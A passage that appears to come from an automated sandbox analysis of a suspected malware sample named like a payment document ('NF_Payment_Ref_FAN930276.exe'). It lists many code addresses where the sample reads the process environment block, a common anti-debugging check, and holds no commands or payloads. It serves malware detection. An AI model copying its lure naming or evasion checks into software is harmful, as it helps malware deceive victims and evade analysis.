Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE5E7 mov eax, dword ptr fs:[00000030h]	4_2_01AEE5E7
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE5E7 mov eax, dword ptr fs:[00000030h]	4_2_01AEE5E7
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE5E7 mov eax, dword ptr fs:[00000030h]	4_2_01AEE5E7
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE5E7 mov eax, dword ptr fs:[00000030h]	4_2_01AEE5E7
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC25E0 mov eax, dword ptr fs:[00000030h]	4_2_01AC25E0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE5CF mov eax, dword ptr fs:[00000030h]	4_2_01AFE5CF
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE5CF mov eax, dword ptr fs:[00000030h]	4_2_01AFE5CF
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC65D0 mov eax, dword ptr fs:[00000030h]	4_2_01AC65D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFA5D0 mov eax, dword ptr fs:[00000030h]	4_2_01AFA5D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFA5D0 mov eax, dword ptr fs:[00000030h]	4_2_01AFA5D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE53E mov eax, dword ptr fs:[00000030h]	4_2_01AEE53E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE53E mov eax, dword ptr fs:[00000030h]	4_2_01AEE53E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE53E mov eax, dword ptr fs:[00000030h]	4_2_01AEE53E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE53E mov eax, dword ptr fs:[00000030h]	4_2_01AEE53E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE53E mov eax, dword ptr fs:[00000030h]	4_2_01AEE53E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0535 mov eax, dword ptr fs:[00000030h]	4_2_01AD0535
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0535 mov eax, dword ptr fs:[00000030h]	4_2_01AD0535
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0535 mov eax, dword ptr fs:[00000030h]	4_2_01AD0535
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0535 mov eax, dword ptr fs:[00000030h]	4_2_01AD0535
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0535 mov eax, dword ptr fs:[00000030h]	4_2_01AD0535
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0535 mov eax, dword ptr fs:[00000030h]	4_2_01AD0535
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B56500 mov eax, dword ptr fs:[00000030h]	4_2_01B56500
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B94500 mov eax, dword ptr fs:[00000030h]	4_2_01B94500
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B94500 mov eax, dword ptr fs:[00000030h]	4_2_01B94500
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B94500 mov eax, dword ptr fs:[00000030h]	4_2_01B94500
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B94500 mov eax, dword ptr fs:[00000030h]	4_2_01B94500
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B94500 mov eax, dword ptr fs:[00000030h]	4_2_01B94500
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B94500 mov eax, dword ptr fs:[00000030h]	4_2_01B94500
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B94500 mov eax, dword ptr fs:[00000030h]	4_2_01B94500
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF656A mov eax, dword ptr fs:[00000030h]	4_2_01AF656A
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF656A mov eax, dword ptr fs:[00000030h]	4_2_01AF656A
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF656A mov eax, dword ptr fs:[00000030h]	4_2_01AF656A
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC8550 mov eax, dword ptr fs:[00000030h]	4_2_01AC8550
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC8550 mov eax, dword ptr fs:[00000030h]	4_2_01AC8550
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4A4B0 mov eax, dword ptr fs:[00000030h]	4_2_01B4A4B0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC64AB mov eax, dword ptr fs:[00000030h]	4_2_01AC64AB
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF44B0 mov ecx, dword ptr fs:[00000030h]	4_2_01AF44B0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B7A49A mov eax, dword ptr fs:[00000030h]	4_2_01B7A49A
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC04E5 mov ecx, dword ptr fs:[00000030h]	4_2_01AC04E5
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABE420 mov eax, dword ptr fs:[00000030h]	4_2_01ABE420
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABE420 mov eax, dword ptr fs:[00000030h]	4_2_01ABE420
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABE420 mov eax, dword ptr fs:[00000030h]	4_2_01ABE420
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABC427 mov eax, dword ptr fs:[00000030h]	4_2_01ABC427
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B46420 mov eax, dword ptr fs:[00000030h]	4_2_01B46420
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B46420 mov eax, dword ptr fs:[00000030h]	4_2_01B46420
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B46420 mov eax, dword ptr fs:[00000030h]	4_2_01B46420
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B46420 mov eax, dword ptr fs:[00000030h]	4_2_01B46420
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B46420 mov eax, dword ptr fs:[00000030h]	4_2_01B46420
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B46420 mov eax, dword ptr fs:[00000030h]	4_2_01B46420
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B46420 mov eax, dword ptr fs:[00000030h]	4_2_01B46420
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFA430 mov eax, dword ptr fs:[00000030h]	4_2_01AFA430
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF8402 mov eax, dword ptr fs:[00000030h]	4_2_01AF8402
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF8402 mov eax, dword ptr fs:[00000030h]	4_2_01AF8402
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF8402 mov eax, dword ptr fs:[00000030h]	4_2_01AF8402
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4C460 mov ecx, dword ptr fs:[00000030h]	4_2_01B4C460
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEA470 mov eax, dword ptr fs:[00000030h]	4_2_01AEA470
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEA470 mov eax, dword ptr fs:[00000030h]	4_2_01AEA470
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEA470 mov eax, dword ptr fs:[00000030h]	4_2_01AEA470
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B7A456 mov eax, dword ptr fs:[00000030h]	4_2_01B7A456
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]	4_2_01AFE443
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]	4_2_01AFE443
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]	4_2_01AFE443
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]	4_2_01AFE443
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]	4_2_01AFE443
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]	4_2_01AFE443
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]	4_2_01AFE443
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]	4_2_01AFE443
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE245A mov eax, dword ptr fs:[00000030h]	4_2_01AE245A
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AB645D mov eax, dword ptr fs:[00000030h]	4_2_01AB645D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC07AF mov eax, dword ptr fs:[00000030h]	4_2_01AC07AF
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B747A0 mov eax, dword ptr fs:[00000030h]	4_2_01B747A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6678E mov eax, dword ptr fs:[00000030h]	4_2_01B6678E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE27ED mov eax, dword ptr fs:[00000030h]	4_2_01AE27ED
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE27ED mov eax, dword ptr fs:[00000030h]	4_2_01AE27ED
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE27ED mov eax, dword ptr fs:[00000030h]	4_2_01AE27ED
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4E7E1 mov eax, dword ptr fs:[00000030h]	4_2_01B4E7E1
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC47FB mov eax, dword ptr fs:[00000030h]	4_2_01AC47FB
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC47FB mov eax, dword ptr fs:[00000030h]	4_2_01AC47FB
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACC7C0 mov eax, dword ptr fs:[00000030h]	4_2_01ACC7C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B407C3 mov eax, dword ptr fs:[00000030h]	4_2_01B407C3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3C730 mov eax, dword ptr fs:[00000030h]	4_2_01B3C730
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFC720 mov eax, dword ptr fs:[00000030h]	4_2_01AFC720
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFC720 mov eax, dword ptr fs:[00000030h]	4_2_01AFC720
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF273C mov eax, dword ptr fs:[00000030h]	4_2_01AF273C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF273C mov ecx, dword ptr fs:[00000030h]	4_2_01AF273C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF273C mov eax, dword ptr fs:[00000030h]	4_2_01AF273C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFC700 mov eax, dword ptr fs:[00000030h]	4_2_01AFC700
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC0710 mov eax, dword ptr fs:[00000030h]	4_2_01AC0710
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF0710 mov eax, dword ptr fs:[00000030h]	4_2_01AF0710
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC8770 mov eax, dword ptr fs:[00000030h]	4_2_01AC8770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]	4_2_01AD0770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]	4_2_01AD0770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]	4_2_01AD0770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]	4_2_01AD0770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]	4_2_01AD0770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]	4_2_01AD0770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]	4_2_01AD0770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]	4_2_01AD0770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]	4_2_01AD0770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]	4_2_01AD0770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]	4_2_01AD0770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]	4_2_01AD0770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02750 mov eax, dword ptr fs:[00000030h]	4_2_01B02750
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02750 mov eax, dword ptr fs:[00000030h]	4_2_01B02750
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B44755 mov eax, dword ptr fs:[00000030h]	4_2_01B44755
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF674D mov esi, dword ptr fs:[00000030h]	4_2_01AF674D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF674D mov eax, dword ptr fs:[00000030h]	4_2_01AF674D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF674D mov eax, dword ptr fs:[00000030h]	4_2_01AF674D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4E75D mov eax, dword ptr fs:[00000030h]	4_2_01B4E75D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC0750 mov eax, dword ptr fs:[00000030h]	4_2_01AC0750
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFC6A6 mov eax, dword ptr fs:[00000030h]	4_2_01AFC6A6
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF66B0 mov eax, dword ptr fs:[00000030h]	4_2_01AF66B0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC4690 mov eax, dword ptr fs:[00000030h]	4_2_01AC4690
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC4690 mov eax, dword ptr fs:[00000030h]	4_2_01AC4690
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3E6F2 mov eax, dword ptr fs:[00000030h]	4_2_01B3E6F2
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3E6F2 mov eax, dword ptr fs:[00000030h]	4_2_01B3E6F2
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3E6F2 mov eax, dword ptr fs:[00000030h]	4_2_01B3E6F2
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3E6F2 mov eax, dword ptr fs:[00000030h]	4_2_01B3E6F2
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B406F1 mov eax, dword ptr fs:[00000030h]	4_2_01B406F1
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B406F1 mov eax, dword ptr fs:[00000030h]	4_2_01B406F1
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFA6C7 mov ebx, dword ptr fs:[00000030h]	4_2_01AFA6C7
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFA6C7 mov eax, dword ptr fs:[00000030h]	4_2_01AFA6C7
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC262C mov eax, dword ptr fs:[00000030h]	4_2_01AC262C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADE627 mov eax, dword ptr fs:[00000030h]	4_2_01ADE627
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF6620 mov eax, dword ptr fs:[00000030h]	4_2_01AF6620
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF8620 mov eax, dword ptr fs:[00000030h]	4_2_01AF8620
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]	4_2_01AD260B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]	4_2_01AD260B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]	4_2_01AD260B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]	4_2_01AD260B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]	4_2_01AD260B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]	4_2_01AD260B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]	4_2_01AD260B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02619 mov eax, dword ptr fs:[00000030h]	4_2_01B02619
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3E609 mov eax, dword ptr fs:[00000030h]	4_2_01B3E609
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFA660 mov eax, dword ptr fs:[00000030h]	4_2_01AFA660
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFA660 mov eax, dword ptr fs:[00000030h]	4_2_01AFA660
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8866E mov eax, dword ptr fs:[00000030h]	4_2_01B8866E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8866E mov eax, dword ptr fs:[00000030h]	4_2_01B8866E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF2674 mov eax, dword ptr fs:[00000030h]	4_2_01AF2674
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADC640 mov eax, dword ptr fs:[00000030h]	4_2_01ADC640
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC09AD mov eax, dword ptr fs:[00000030h]	4_2_01AC09AD
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC09AD mov eax, dword ptr fs:[00000030h]	4_2_01AC09AD
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B489B3 mov esi, dword ptr fs:[00000030h]	4_2_01B489B3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B489B3 mov eax, dword ptr fs:[00000030h]	4_2_01B489B3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B489B3 mov eax, dword ptr fs:[00000030h]	4_2_01B489B3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4E9E0 mov eax, dword ptr fs:[00000030h]	4_2_01B4E9E0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF29F9 mov eax, dword ptr fs:[00000030h]	4_2_01AF29F9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF29F9 mov eax, dword ptr fs:[00000030h]	4_2_01AF29F9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8A9D3 mov eax, dword ptr fs:[00000030h]	4_2_01B8A9D3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B569C0 mov eax, dword ptr fs:[00000030h]	4_2_01B569C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA9D0 mov eax, dword ptr fs:[00000030h]	4_2_01ACA9D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA9D0 mov eax, dword ptr fs:[00000030h]	4_2_01ACA9D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA9D0 mov eax, dword ptr fs:[00000030h]	4_2_01ACA9D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA9D0 mov eax, dword ptr fs:[00000030h]	4_2_01ACA9D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA9D0 mov eax, dword ptr fs:[00000030h]	4_2_01ACA9D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA9D0 mov eax, dword ptr fs:[00000030h]	4_2_01ACA9D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF49D0 mov eax, dword ptr fs:[00000030h]	4_2_01AF49D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4892A mov eax, dword ptr fs:[00000030h]	4_2_01B4892A
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B5892B mov eax, dword ptr fs:[00000030h]	4_2_01B5892B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4C912 mov eax, dword ptr fs:[00000030h]	4_2_01B4C912
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AB8918 mov eax, dword ptr fs:[00000030h]	4_2_01AB8918
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AB8918 mov eax, dword ptr fs:[00000030h]	4_2_01AB8918
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3E908 mov eax, dword ptr fs:[00000030h]	4_2_01B3E908
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3E908 mov eax, dword ptr fs:[00000030h]	4_2_01B3E908
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4C97C mov eax, dword ptr fs:[00000030h]	4_2_01B4C97C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE6962 mov eax, dword ptr fs:[00000030h]	4_2_01AE6962
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE6962 mov eax, dword ptr fs:[00000030h]	4_2_01AE6962
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE6962 mov eax, dword ptr fs:[00000030h]	4_2_01AE6962
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B64978 mov eax, dword ptr fs:[00000030h]	4_2_01B64978
